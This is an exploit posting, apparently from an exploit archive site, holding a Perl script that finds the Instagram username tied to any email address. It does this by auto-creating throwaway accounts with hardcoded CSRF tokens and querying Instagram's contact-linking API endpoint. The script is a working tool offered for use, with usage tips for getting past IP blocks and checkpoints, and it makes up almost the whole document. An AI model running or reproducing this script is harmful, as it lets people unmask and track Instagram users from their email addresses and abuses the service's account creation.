API Instagram Exploit - Get The Real Username By Email

2018.02.02
sa 1337r00t (SA) sa
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

1- if you see this : [Sorry, Fail Step 1 Because Block Creating Accounts :( try later plz] -> don't worry, this is just block IP [Fix: Restart Tool later] 2- if you see this : [Sorry, Fail Step 2 Because 2FA, Plz Try Again Now !.] -> don't worry, this is just Checkpoint [Fix: Just Try Again] Thank You - 1337r00t #!usr/bin/perl ################################## # CoDed by 1337r00t ############# # Now You Can Get The Real Username By Email [Instagram] ############# # Tested on: Windows[CMD] ~ Linux[Parrot] # Date: 1/2/2018 # Vendor Homepage: https://instagram.com/ # Exploit Author: 1337r00t (@_1337r00t) ############################################### # X-MSG-To-Instagram: Nothing Good For you :( # ############################################### # Gz: ReYaM[RoRDeZ] - x03x - Dr.Abolalh - Lion Hacker - Evil~r00t - ################################## use LWP::UserAgent; ############### system('cls'); print q( |------------------------| | Priv8 Tool | |------------------------| | #Exploit# | | Get Username By Email | | By 1337r00t | |------------------------| | Follow Me | |~~~~~~~~~~~~~~~~~~~~~~~~| | Twitter: @_1337r00t | | Instagram: @x1337r00t | |------------------------| You're So nice Today :} Fuck Instagram DuDe );#X-MSG-SKids: Don't Edit Anything print "Email => "; $mails = <STDIN>; chomp($mails); print "\n"; # Ruuuuuun print email($mails); ##########33 ############### sub email($){ ($email) = @_; unlink 'sessionids.txt'; $mail = 'a'.time.'@gmail.com'; $pass = 'aaaaa2242'; $user = 'a'.time.'a'; print "\n-----\nStep 1 - Create Account To Get Username [Wait!..]\n-----\n"; $sessions = LWP::UserAgent->new(); $sessions->default_header('Referer'=>"https://www.instagram.com/"); $sessions->default_header('X-CSRFToken'=>"KEG1ZgoSE7i4IGWIzqm20zCMqZAnx0OW"); $sessions->default_header('Cookie'=>"csrftoken=KEG1ZgoSE7i4IGWIzqm20zCMqZAnx0OW;"); $seesed = $sessions->post('https://www.instagram.com/accounts/web_create_ajax/',{email=>$mail,password=>$pass,username=>$user}); $out = $seesed->header('Set-Cookie'); if($out=~/sessionid/){ print "Created :)\n\n-----\nStep 2 - Get Username [Wait!...]\n-----\n"; open(SESSION,">>sessionids.txt"); print SESSION $seesed->header('Set-Cookie')=~/sessionid=(.+?);/;; close(SESSION); open (SESSIONFILE, "<sessionids.txt"); @sessionids = <SESSIONFILE>; close SESSIONFILE; foreach $sessionid (@sessionids) { chomp $sessionid; $post = '[{"email_addresses":["'.$email.'"]}]'; $getting = LWP::UserAgent->new(); $getting->default_header('Cookie'=>"sessionid=$sessionid;"); $getting->default_header('User-Agent'=>"Instagram 7.16.0 Android"); $getted = $getting->post('https://i.instagram.com/api/v1/address_book/link/',{contacts=>$post}); unlink 'sessionids.txt'; if($getted->content=~/"pk"/){ print "\n-------------------\n"; print "Username: "; return $getted->content=~/"username": "(.+?)"/; }else{ if($getted->content=~/"logout_reason": 3,/){ return "Sorry, Fail Step 2 Because 2FA, Plz Try Again Now !."; }else{ return "Email -> ($email) Not Found :("; } } } }else{ return 'Sorry, Fail Step 1 Because Block Creating Accounts :( try later plz'; } }


Vote for this issue:
35%
65%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top